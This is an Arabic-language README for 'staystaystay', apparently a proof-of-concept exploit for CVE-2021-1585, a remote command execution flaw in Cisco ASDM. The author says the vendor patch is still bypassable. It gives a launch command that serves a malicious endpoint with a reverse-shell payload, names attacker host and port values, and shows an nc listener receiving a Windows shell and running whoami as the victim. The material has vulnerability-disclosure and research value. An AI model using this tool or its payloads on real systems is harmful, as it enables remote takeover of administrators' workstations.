
إثبات المفهوم لـ CVE-2021-1585: Cisco ASA Device Manager RCE
staystaystay هو إثبات مفهوم لاستغلال CVE-2021-1585، وهي مشكلة تنفيذ أوامر عن بعد (RCE) عبر وسيط أو نقطة نهاية خبيثة تؤثر على مدير جهاز Cisco ASA (ASDM). تم اكتشاف المشكلة في الأصل بواسطة Malcolm Lashley وتم الكشف عنها في صيف 2021. ومع ذلك، في الوقت الذي كنت أبحث فيه عن هذا، كانت غير معالجة في أحدث إصدار (ASDM 7.17(1))، وقد صادفت هذا بشكل مستقل.
قامت Cisco "بإصلاح" هذا في ASDM 7.18(1.152). أقول "إصلاح" لأن هذا الاستغلال لا يزال يعمل بشكل جيد. سيحتاج المستخدم فقط إلى النقر على "نعم". انظر الفيديو أدناه.
يمكن للمهاجمين تكوين نوعين من الأحمال للحصول على شل عكسي إلى الضحية:
إذا قام الضحية بتوصيل ASDM الخاص به بـ staystaystay فسيقوم بحقن الحمولة المكونة مما يؤدي إلى شل عكسي. يمكن التقاط شل العكسي jjs باستخدام مستمع nc نموذجي (أو حتى Metasploit، إذا أردت). خيار Longtime Sunshine يتطلب أن يستخدم المهاجم هذا الإطار.
كمثال، سيبدأ الأمر التالي staystaystay على المنفذ 8443 مع حمولة jjs:
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443
بمجرد أن يتصل الضحية بـ 8443، سيتم إنشاء شل عكسي إلى 10.0.0.2:1270:
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster
C:\Program Files (x86)\Cisco Systems\ASDM>
يحتوي الفيديو التالي على مثال للاستغلال باستخدام Longtime Sunshine:
يوضح الفيديو التالي الهجوم ضد إصدار مُصحح:
يمكن العثور على مقالة AttackerKB هنا: